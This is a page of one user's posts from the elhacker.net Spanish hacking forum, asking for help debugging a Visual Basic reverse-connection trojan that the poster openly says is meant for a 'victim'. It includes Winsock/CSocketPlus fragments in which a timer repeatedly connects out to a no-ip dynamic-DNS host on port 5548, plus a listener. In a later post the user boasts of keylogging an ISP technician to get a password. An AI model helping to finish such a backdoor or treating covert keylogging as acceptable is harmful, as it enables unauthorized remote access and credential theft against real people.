elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 2 [3]
21  Programación / Programación Visual Basic / Re: Ayuda Troyano conexion inversa en: 8 Julio 2009, 01:15 am
Saludos

pues en google encontre las claves por defecto pero mi isp la cambio, y cuando resetee el modem desconfigure la red inalambria y tuve que llamar el tecnico,
y cuadno vino le tenia preparado un keylogger y le saque la clave jeje

bueno ahora con la clave voy a ver que ago y luego les cuento
22  Programación / Programación Visual Basic / Re: Ayuda Troyano conexion inversa en: 6 Julio 2009, 02:03 am
Gracias por responder jeje no me fije antes,
pero ahora tengo un problema no puedo entrar a la configuracion de mi router, en mi ISP no me dieron la clave y pues hay... no tengo idea
bueno si alguien sabe como le ago para entrar mi router es un Echolife Hg520s

Gracias
23  Programación / Programación Visual Basic / Re: Ayuda Troyano conexion inversa en: 5 Julio 2009, 01:23 am
Saludos

la verdad no me a querido conectar de ningun modo, para probar cree un sencillo porgrama de chat como los que usan para ejemplificar el uso de winsock, y se lo envie a un amigo y coloque a la escucha y le dije que se conetara a el puerto que puse a escuchar y a mi ip directamente ni siquiera a el dominio de no-ip y pues no sirvio  :-\
estoy a punto de arrojar el pc por la ventana
dejo el codigo para ver que ise mal o que rayos pasa

Código:
Option Explicit
Private WithEvents WS As CSocketPlus

Private Sub Command1_Click()
WS.CloseSck 1
WS.Connect (1), txtIP.Text, txtport.Text
End Sub

Private Sub Command2_Click()
WS.SendData 1, txtenviar.Text

End Sub

Private Sub Form_Load()
Set WS = New CSocketPlus
WS.ArrayAdd 1


End Sub
se supone que este deberia conectarse a este que esta escuchando

Código:

Private Sub Command1_Click()
If txtport <> "" Then

WS.CloseSck 1
WS.LocalPort(1) = txtport
WS.Listen 1
LbStado.Caption = "Escuchando"
cmdEnviar.Enabled = False
Else
MsgBox "Digite algun Puerto"
End If
End Sub

Private Sub Form_Load()
Set WS = New CSocketPlus
WS.ArrayAdd 1
End Sub

Gracias por su ayuda
24  Programación / Programación Visual Basic / Re: Ayuda Troyano conexion inversa en: 4 Julio 2009, 03:24 am
jeje, no creo que sea servir en bandeja de plata como dices, pues detodos modos para eso se supone que esta el foro, imagina que viniera alguien a preguntar y la respuesta fuera simplemente, "matate buscando en internet"

Gracias
25  Programación / Programación Visual Basic / Re: Ayuda Troyano conexion inversa en: 24 Junio 2009, 23:49 pm
Gracias, igual ahora me voy de viaje espero llegar con nuevas energias para terminar ese troyano, talves tenga que volver a el papel y diseñhazlo de nuevo con el CSocketPlus

Gracias
26  Programación / Programación Visual Basic / Re: Ayuda Troyano conexion inversa en: 24 Junio 2009, 22:46 pm
Saludos

bueno probe lo que me dijiste y no funciono no se porque  :huh:
le cambie el dominio de no-ip por mi ip se lo envie a mi amigo y le deje el msgbox que muestra el estado de la conexión, entoces coloce a escuchar el programa en mi pc y le dije a mi compañero que lo ejecutara y bueno le salieron los mensajes de el estado y siempre era 6, osea conectando, y no se conectaba
igual cada vez que el le daba aceptar a el Msgbox se supone que se debia interntar conectar pero no sirvio, la verdad no tengo idea.........
la otra duda que me surgio ahora es que el winsock tiene otro protocolo que es UDP y quisiera saber si con este protocolo se podria hacer un troyano, la verdad se muy poco acerca de este pero, me nace la duda
Gracias
27  Programación / Programación Visual Basic / Re: Ayuda Troyano conexion inversa en: 24 Junio 2009, 18:21 pm
en ese caso pongo el fracmento de codigo que se supone coloca a la escucha el Cliente

Private Sub Command1_Click()
ws2.CloseSck
ws2.Protocol = sckTCPProtocol
ws2.LocalPort = 5548

ws2.Listen
End Sub

y el otro esta en un timer

Private Sub Timer1_Timer()

If Not WS.State = 7 Then
WS.CloseSck
WS.RemotePort = 5548
WS.RemoteHost = "sircam66.no-ip.biz"
WS.Connect

Else
Timer1.Enabled = False
End If
End Sub

y creo que ese seria el pedacito que importa, de todas formas, puedes pasarme la pagina oficial del CSocketMAster
Gracias
28  Programación / Programación Visual Basic / Re: Ayuda Troyano conexion inversa en: 24 Junio 2009, 03:51 am
Vamos, nadie me ayuda XD   :silbar:

jeje
29  Programación / Programación Visual Basic / Ayuda Troyano conexion inversa en: 24 Junio 2009, 00:57 am
Saludos

regreso a este foro despues de ojearlo hace ya bastante tiempo para ver si alguien me puede ayudar con un problema,
estoy creando un troyano en VB de conexion inversa y pues tecnicamente ya termine, pero las pruebas las estaba realizando en el mismo PC, es decir el winsock se conectaba a la IP local,
entonces luego cambie por un dominio en noip.com, dado que mi IP es dinamica y ya tenia intenciones de enviarlo a la victima, pero antes de enviarlo, decidi probar en la misma PC ( no se si es por eso..)  y pues puse el programa a la escucha y ejecute el otro que se deberia conectar pero no paso nada...
entonces para mirar que pasaba puse un Msgbox que me indicaba el estado de conexion y me arrojo 4, mire y dice que es Resolviendo Host, y pues la verdad no se que significa XD, ni tampoco como arreglarlo jeje,
agradezco mucho a el que me pueda colaborar, es mi primer troyano usando el CSocketMaster , y creo que me estaba quedando bien jejeje
Gracias de antemano
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines